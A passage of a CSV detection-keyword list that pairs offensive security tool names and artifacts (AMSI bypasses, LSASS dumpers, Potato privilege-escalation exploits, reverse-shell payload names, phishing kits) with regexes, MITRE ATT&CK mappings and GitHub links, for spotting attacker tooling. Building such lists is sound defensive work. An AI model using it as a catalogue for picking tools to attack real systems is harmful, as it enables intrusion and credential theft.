no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Already SYSTEM*not elevating*",".{0,1000}Already\sSYSTEM.{0,1000}not\selevating.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*AlteredSecurity/365-Stealer*",".{0,1000}AlteredSecurity\/365\-Stealer.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*alwaysinstallelevated.*",".{0,1000}alwaysinstallelevated\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*alwaysinstallelevated.c*",".{0,1000}alwaysinstallelevated\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*alwaysinstallelevated.o*",".{0,1000}alwaysinstallelevated\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*am0nsec/HellsGate*",".{0,1000}am0nsec\/HellsGate.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*amass enum -d *",".{0,1000}amass\senum\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*amass-get-rootdomains*",".{0,1000}amass\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*amass-get-subdomains*",".{0,1000}amass\-get\-subdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*amibypass.exe*",".{0,1000}amibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - 
T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*amkmjjmmflddogmhpjloimipbofnfjih*",".{0,1000}amkmjjmmflddogmhpjloimipbofnfjih.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Amnesiac.ps1*",".{0,1000}Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Amnesiac-main.zip*",".{0,1000}Amnesiac\-main\.zip.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*AMS1-Patch.exe*",".{0,1000}AMS1\-Patch\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - 
T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AMSI patched in all powershells*",".{0,1000}AMSI\spatched\sin\sall\spowershells.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*AMSI_Bypass.ps1*",".{0,1000}AMSI_Bypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AMSI_bypass_20*.ps1",".{0,1000}AMSI_bypass_20.{0,1000}\.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*AMSI_patch-main*",".{0,1000}AMSI_patch\-main.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*Amsi-Bypass*",".{0,1000}Amsi\-Bypass.{0,1000}","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*amsi-bypass*",".{0,1000}amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*AmsiBypass.cs*",".{0,1000}AmsiBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*amsibypass.exe*",".{0,1000}amsibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Amsi-Killer.exe*",".{0,1000}Amsi\-Killer\.exe.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer.sln*",".{0,1000}Amsi\-Killer\.sln.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer.vcxproj*",".{0,1000}Amsi\-Killer\.vcxproj.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer-master*",".{0,1000}Amsi\-Killer\-master.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*AmsiOpenSession.cpp*",".{0,1000}AmsiOpenSession\.cpp.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.sln*",".{0,1000}AmsiOpenSession\.sln.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.vcxproj*",".{0,1000}AmsiOpenSession\.vcxproj.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiTrigger.exe*",".{0,1000}AmsiTrigger\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*AMSITrigger.exe*",".{0,1000}AMSITrigger\.exe.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*AmsiTrigger_x64.exe*",".{0,1000}AmsiTrigger_x64\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*amsitrigger_x64.exe*",".{0,1000}amsitrigger_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*AmsiTrigger_x86.exe*",".{0,1000}AmsiTrigger_x86\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*An interactive shell to spoof some LOLBins*",".{0,1000}An\sinteractive\sshell\sto\sspoof\ssome\sLOLBins.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*An0nUD4Y/Evilginx2-Phishlets*",".{0,1000}An0nUD4Y\/Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "*and Credential Guard will not be bypassed*",".{0,1000}and\sCredential\sGuard\swill\snot\sbe\sbypassed.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*andotp2john.py*",".{0,1000}andotp2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AndrewSpecial.cpp*",".{0,1000}AndrewSpecial\.cpp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial.exe*",".{0,1000}AndrewSpecial\.exe.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial-master*",".{0,1000}AndrewSpecial\-master.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*android/meterpreter/reverse_tcp*",".{0,1000}android\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*androidbackup2john.py*",".{0,1000}androidbackup2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*androidfde2john.py*",".{0,1000}androidfde2john\.py.{0,1000}","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AnErrupTion/LoGiC.NET*",".{0,1000}AnErrupTion\/LoGiC\.NET.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","5","6","506","78","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*Anevicon*",".{0,1000}Anevicon.{0,1000}","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ANGRYPUPPY2.cna*",".{0,1000}ANGRYPUPPY2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*anonsurf.py*",".{0,1000}anonsurf\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*ansible2john.py*",".{0,1000}ansible2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*anthemtotheego/Detect-Hooks*",".{0,1000}anthemtotheego\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*anthemtotheego/SharpSploitConsole*",".{0,1000}anthemtotheego\/SharpSploitConsole.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*antirez/hping*",".{0,1000}antirez\/hping.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*AntivirusBypass.psm1*",".{0,1000}AntivirusBypass\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*antiword FUZZ*",".{0,1000}antiword\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*antonioCoco/ConPtyShell*",".{0,1000}antonioCoco\/ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*antonioCoco/JuicyPotatoNG*",".{0,1000}antonioCoco\/JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*antonioCoco/RemotePotato0*",".{0,1000}antonioCoco\/RemotePotato0.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*antonioCoco/RoguePotato*",".{0,1000}antonioCoco\/RoguePotato.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to 
System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*antonioCoco/RogueWinRM*",".{0,1000}antonioCoco\/RogueWinRM.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 